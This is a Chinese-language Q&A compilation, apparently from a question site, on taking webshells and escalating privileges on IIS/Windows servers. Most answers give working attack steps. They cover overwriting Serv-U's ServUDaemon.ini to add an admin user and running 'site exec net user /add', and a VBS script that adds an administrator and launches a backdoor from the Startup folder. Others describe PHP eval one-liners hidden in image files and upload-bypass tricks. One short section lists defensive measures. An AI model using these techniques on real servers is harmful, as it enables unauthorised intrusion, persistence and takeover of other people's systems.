Ⅰ 如果我可以创建一个类似/aaaa.asp 这样的目录,下面是不是传上我的图片马就可以拿shell呀
这个是IIS6.0里面的一个asp漏洞,也就是目录解析漏洞。现在有很多补丁可以用了。基本上没有这种漏洞了。出来菜鸟的服务器管理员!
Ⅱ 已经传上大马,怎么拿shell,直至提权
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\“开始”菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是
Ⅲ 如何防止上传图片木马
目前无组件上传类都存在此类漏洞——即黑客利用“抓包嗅探伪造IP包,突破服务器端对上传文件名、路径的判断,巧妙上传ASP、ASA、CGI、CDX、CER、ASPX类型的木马。
防范方法:删除后台管理中的恢复/备份数据库功能。
检查您的网页是否有备份数据的功能..或者能把文件重新命名的功能.
数据备份建议使用绝对路径.
黑客应该是先把网马shell 改成jpg 然后上传后.利用备份功能...改为asp.
通用防范上传漏洞入侵秘笈:将服务器端的组件改名
将FileSystemObject组件、WScript.Shell组件、Shell.Application组件改名,然后禁用Cmd.exe,就可以预防漏洞上传攻击。
Ⅳ 后台能上传图片,怎么拿shell
1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php
2、使用edjpgcom工具注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php
3、cmd命令下 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php
4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。
Ⅳ 简约论坛v3.0怎么拿shell
拿WebShell有很多种方法,先找上传图片的地方,如果能上传asp格式的就直接拿到Shell了,这种情况比较少了,如果有数据库备份,直接把jpg格式的木马备份成asp的,如果没备份的话抓包上传或nc提交,一般抓包能找到上传漏洞,然后用工具例如明小子上传,另外抓包有可能查看到网站系统用的ewebeditor的话,可以进入在线编辑器,添加asp格式,直接上传asp马,还有可以利用gif头文件图片,有备份没上传的话可以向数据库中插入一句话木马备份成asp的,还有利用win2003解析漏洞de方法,基本的就是这些了,思路非常多,重要的是有个灵活的头脑~~
Ⅵ 我上传了jpg木马,访问时被解析了,怎么办
1,是服务器的蓝本里面出现了图片木马么
2,这个别留着,及时的查杀了吧
3,装个电脑管家,用病毒查杀,找出图片病毒全部删除了